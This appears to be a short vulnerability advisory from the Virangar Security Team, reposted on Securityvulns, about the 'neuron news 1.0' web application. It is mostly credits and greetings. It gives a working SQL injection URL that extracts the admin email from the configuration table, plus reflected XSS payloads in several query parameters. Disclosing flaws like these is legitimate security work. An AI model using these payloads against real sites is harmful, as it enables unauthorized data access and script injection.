SecurityvulnsSECURITYVULNS:DOC:18668neuron news1.0 Multiple Remote Vulnerabilities (sql injection/xss)
####################################################################
…:::::neuron news1.0 Multiple Remote Vulnerabilities::::…
(sql injection/xss)
####################################################################
Virangar Security Team
www.virangar.org
www.virangar.net
Discoverd By : virangar security team
(hadihadi & black.shadowes)
special tnx to:MR.nosrati,MR.hesy,satan,Zahra
& all virangar members & all iranian hackerz
greetz:to my best friend in the world hadi_aryaie2004
vlues:
1.sql injection:
http://site.com/patch/?q='/**/union/**/select/**/1,2,adminmail,4,id/**/from/**/neuronnews_configuration/*
########################
2.xss:
http://site.com/patch/?q=viewtopic&topic=<script>alert(111111)</script>
http://site.com/patch/?q=newsarchive&newsyear=<script>alert(111111)</script>
http://site.com/patch/?q=newsarchive&newsyear=<script>alert(111111)</script>&newsmonth=<script>alert(111111)</script>
########################
g00d l0uck